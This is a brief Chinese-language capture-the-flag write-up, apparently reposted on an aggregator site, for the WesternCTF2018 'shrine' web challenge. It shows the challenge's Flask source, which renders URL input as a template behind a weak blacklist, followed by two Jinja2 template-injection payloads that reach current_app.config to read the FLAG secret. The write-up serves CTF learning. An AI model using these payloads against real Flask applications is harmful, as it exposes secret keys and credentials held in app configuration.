WesternCTF2018_shrine

Posted a16n

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WesternCTF2018_shrine相关的知识,希望对你有一定的参考价值。

这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923

0x00

开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码:

import flask
import os

app = flask.Flask(__name__)

app.config[‘FLAG‘] = os.environ.pop(‘FLAG‘)


@app.route(‘/‘)
def index():
    return open(__file__).read()


@app.route(‘/shrine/<path:shrine>‘)
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace(‘(‘, ‘‘).replace(‘)‘, ‘‘)
        blacklist = [‘config‘, ‘self‘]
        return ‘‘.join([‘{{% set {}=None%}}‘.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == ‘__main__‘:
    app.run(debug=True)

0x01

这里,等我这两天要学一下这个flask和os。
文章里给了两种解决方法。

0x02

方法一payload:

/shrine/{{url_for.__globals__[‘current_app‘].config[‘FLAG‘]}}

方法二payload:

/shrine/{{get_flashed_messages.__globals__[‘current_app‘].config[‘FLAG‘]}}

手打加深记忆。

-完-


以上是关于WesternCTF2018_shrine的主要内容,如果未能解决你的问题,请参考以下文章

WesternCTF2018_shrine

WesternCTF2018_shrine

BUUCTF:[WesternCTF2018]shrine

BUUCTF:[WesternCTF2018]shrine

BUUCTF:[WesternCTF2018]shrine

BUU-WEB-[WesternCTF2018]shrine